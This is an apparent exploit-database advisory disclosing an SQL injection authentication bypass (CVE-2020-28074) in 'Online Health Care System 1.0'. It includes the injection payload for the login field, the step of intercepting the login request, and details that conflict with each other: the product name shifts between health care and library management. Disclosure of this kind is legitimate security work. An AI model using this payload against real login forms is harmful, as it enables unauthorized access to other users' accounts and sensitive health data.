Online Health Card System 1.0 SQL Injection

Online Health Care System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 8449dc34abd63dadf764b09a23b18231

# Exploit Title: ​Authentication Bypass via ​SQL injection on ​Online Health Care System 1.0 # Date: 23/10/2020
# Exploit Author: Valerio Alessandroni
# Vendor Homepage:
# Software Link: 2020.html
# Version: 1.0
# Tested on: ubuntu 18.04
# CVE : ​CVE-2020-28074
# Description:
SQL injection on Library Management System v1.0 allows a potentially attacker to bypass the user authentication and impersonificate every user on the system.
# Reproduction:
- Go to login page (​​) - intercept the login request and replace the parameters
[email protected]' AND 1=1;-- - password=RandomlyText

